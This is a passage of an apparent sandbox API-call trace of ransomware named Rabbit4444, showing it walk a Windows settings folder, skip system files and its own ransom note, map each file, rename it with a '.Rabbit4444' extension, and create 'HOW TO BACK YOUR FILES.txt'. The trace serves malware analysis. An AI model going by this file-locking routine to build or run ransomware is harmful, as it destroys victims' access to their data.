param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms.Rabbit4444") returned 202 [0060.662] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{b98a2bea-7d42-4558-8bd1-832f41bac6fd}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{b98a2bea-7d42-4558-8bd1-832f41bac6fd}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed7d1669, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xed7d1669, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xeda59e9b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x479, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", cAlternateFileName="NA05E9~1.SET")) returned 1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2=".") returned 1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="..") returned 1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="windows") returned -1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="boot") returned 1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="ids.txt") returned 1 [0060.663] lstrcmpiW (lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0060.663] lstrcpyW (in: lpString1=0x130ec22, lpString2="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms" | out: lpString1="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms") returned="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms" [0060.663] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.663] lstrlenW (lpString="NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms") returned 74 [0060.663] lstrlenW (lpString="Rabbit4444") returned 10 [0060.664] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.664] lstrlenW (lpString=".dll") returned 4 [0060.664] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.664] lstrlenW (lpString=".lnk") returned 4 [0060.664] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.664] lstrlenW (lpString=".ini") returned 4 [0060.664] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.664] lstrlenW (lpString=".sys") returned 4 [0060.664] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{d8559eb9-20c0-410e-beda-7ed416aecc2a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.664] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.664] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15197489240) returned 1 [0060.664] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1145) returned 1 [0060.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0060.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0060.664] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x29c [0060.665] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0060.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0060.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0060.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0060.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0060.667] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15197728364) returned 1 [0060.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0060.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0060.667] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.667] CloseHandle (hObject=0x29c) returned 1 [0060.667] CloseHandle (hObject=0x2a0) returned 1 [0060.667] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms.Rabbit4444") returned 202 [0060.667] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{d8559eb9-20c0-410e-beda-7ed416aecc2a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{d8559eb9-20c0-410e-beda-7ed416aecc2a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.668] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedbd7796, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xedbd7796, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xeddc74c5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", cAlternateFileName="NA4C47~1.SET")) returned 1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2=".") returned 1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="..") returned 1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="windows") returned -1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="bootmgr") returned 1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="boot") returned 1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="ids.txt") returned 1 [0060.668] lstrcmpiW (lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0060.668] lstrcpyW (in: lpString1=0x130ec22, lpString2="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms" | out: lpString1="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms") returned="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms" [0060.668] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.668] lstrlenW (lpString="NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms") returned 74 [0060.668] lstrlenW (lpString="Rabbit4444") returned 10 [0060.668] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.668] lstrlenW (lpString=".dll") returned 4 [0060.668] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.669] lstrlenW (lpString=".lnk") returned 4 [0060.669] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.669] lstrlenW (lpString=".ini") returned 4 [0060.669] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.669] lstrlenW (lpString=".sys") returned 4 [0060.669] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.669] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{f942c606-0914-47ab-be56-1321b8035096}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.669] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.669] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15197981021) returned 1 [0060.669] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0060.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0060.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0060.669] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x29c [0060.670] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0060.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0060.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0060.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0060.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0060.671] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15198217036) returned 1 [0060.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0060.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0060.672] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.672] CloseHandle (hObject=0x29c) returned 1 [0060.672] CloseHandle (hObject=0x2a0) returned 1 [0060.672] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms.Rabbit4444") returned 202 [0060.672] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{f942c606-0914-47ab-be56-1321b8035096}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{F942C606-0914-47AB-BE56-1321B8035096}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{f942c606-0914-47ab-be56-1321b8035096}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.673] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5800ae7c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5800ae7c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2433f6fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", cAlternateFileName="SETTIN~1.SET")) returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="Rabbit4444.exe") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2=".") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="..") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="windows") returned -1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="bootmgr") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="pagefile.sys") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="boot") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="ids.txt") returned 1 [0060.673] lstrcmpiW (lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", lpString2="NTUSER.DAT") returned 1 [0060.673] lstrcpyW (in: lpString1=0x130ec22, lpString2="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms" | out: lpString1="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms") returned="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms" [0060.673] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.674] lstrlenW (lpString="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms") returned 69 [0060.674] lstrlenW (lpString="Rabbit4444") returned 10 [0060.674] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.674] lstrlenW (lpString=".dll") returned 4 [0060.674] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.674] lstrlenW (lpString=".lnk") returned 4 [0060.674] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.674] lstrlenW (lpString=".ini") returned 4 [0060.674] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.674] lstrlenW (lpString=".sys") returned 4 [0060.674] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.674] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\settingspane_{4b719a8a-ce18-4033-be59-1083b40f25b7}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.674] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.674] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15198499209) returned 1 [0060.674] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=846) returned 1 [0060.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0060.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0060.674] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x29c [0060.675] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x70000 [0060.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0060.676] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0060.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0060.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0060.677] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15198757175) returned 1 [0060.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0060.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0060.677] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.677] CloseHandle (hObject=0x29c) returned 1 [0060.677] CloseHandle (hObject=0x2a0) returned 1 [0060.677] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms.Rabbit4444") returned 197 [0060.677] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\settingspane_{4b719a8a-ce18-4033-be59-1083b40f25b7}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\settingspane_{4b719a8a-ce18-4033-be59-1083b40f25b7}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.678] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5800ae7c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5800ae7c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2433f6fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SettingsPane_{4B719A8A-CE18-4033-BE59-1083B40F25B7}.settingcontent-ms", cAlternateFileName="SETTIN~1.SET")) returned 0 [0060.678] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0060.678] lstrcpyW (in: lpString1=0x130ec22, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.678] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.679] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.679] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.679] UnmapViewOfFile 